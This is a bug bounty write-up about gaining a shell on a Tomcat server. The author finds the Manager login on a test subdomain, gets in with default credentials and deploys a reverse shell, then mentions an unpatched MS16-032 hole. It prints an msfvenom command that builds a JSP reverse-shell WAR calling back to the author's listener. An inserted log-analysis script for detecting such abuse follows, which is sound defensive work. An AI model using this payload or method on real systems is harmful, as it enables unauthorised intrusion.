From TOMCAT to NT AUTHORITY\SYSTEM
So it's been some time since I've done any Bug Bounty as I was busy working.
I won't be revealing the Program due to Privacy Issues…
I started my initial recon by doing some subdomain enumeration using Knockpy, Sublist3r, etc.
And I got a subdomain named test.REDACTED.com. There was nothing much to look for; it returned a simple static HTML page. Then I did a Directory Scan using Dirsearch.
“/manager”, that's a TOMCAT LOGIN.
Checking if it used the default login was much more satisfying.
And drum roll…
We have a LOGIN
Now it's time to pop a shell. I used my AWS server as a listener.
Generating a JSP payload packed as a WAR can be achieved using this command:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=18.191.1**.* LPORT=4444 -f war > shell.war
**You can open a custom port for the listener by adding it to the inbound rules section.**
Now for the TCP handler.
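As an added detection example (not part of the original post, and not the program's own tooling), here is a script that scans Tomcat access-log lines in the default `%h %l %u %t "%r" %s %b` pattern for the sequence this writeup describes: an authenticated Manager session, a WAR upload through the Manager, and a first hit on the freshly deployed context. The sample log lines, addresses, user name, timestamps and the `/shell` context are constructed.

```python
import re
from collections import namedtuple

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Constructed sample log (addresses, user, timestamps and the /shell context are made up),
# modelled on the sequence in this writeup: manager login, WAR upload, first hit on the app.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2019:10:14:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - tomcat [12/Mar/2019:10:14:05 +0000] "GET /manager/html HTTP/1.1" 200 18937
203.0.113.7 - tomcat [12/Mar/2019:10:14:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 19102
203.0.113.7 - - [12/Mar/2019:10:14:52 +0000] "GET /shell/ HTTP/1.1" 200 0
198.51.100.20 - - [12/Mar/2019:10:20:00 +0000] "GET /index.html HTTP/1.1" 200 512
"""

Alert = namedtuple("Alert", "host rule path")

def detect_manager_abuse(log_text):
    alerts = []
    deployers = set()  # source hosts that deployed an application via the manager
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected access-log format; skip
        host, user, method, path, status = m.group("host", "user", "method", "path", "status")
        if status != "200":
            continue  # failed logins (401) are noisy; only successful requests matter here
        if path.startswith("/manager") and user != "-":
            alerts.append(Alert(host, "manager-auth", path))  # someone is logged into /manager
        # The HTML manager uploads via POST /manager/html/upload; the text interface
        # (used by tools and scripts) deploys via PUT /manager/text/deploy?path=...
        uploaded = method == "POST" and path.startswith("/manager/html/upload")
        deployed = method == "PUT" and path.startswith("/manager/text/deploy")
        if uploaded or deployed:
            alerts.append(Alert(host, "war-deploy", path))
            deployers.add(host)
        elif host in deployers and not path.startswith("/manager"):
            # the deploying host now requests something outside the manager: likely the new app
            alerts.append(Alert(host, "post-deploy-access", path))
    return alerts

if __name__ == "__main__":
    for a in detect_manager_abuse(SAMPLE_LOG):
        print(f"{a.host:15} {a.rule:19} {a.path}")
```

Feed it a real `localhost_access_log.*.txt` and a `war-deploy` followed by `post-deploy-access` from the same host is the pattern worth paging on; a `manager-auth` alone tells you who still has the Manager reachable with a working password.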
On further enumeration I found that the server was Microsoft Windows Server 2012, which was not looked after very often: the last patch was in 2016 (poor guy).
And it was vulnerable to MS16-032, but I never tried to exploit it because it might piss off some of the DEVS.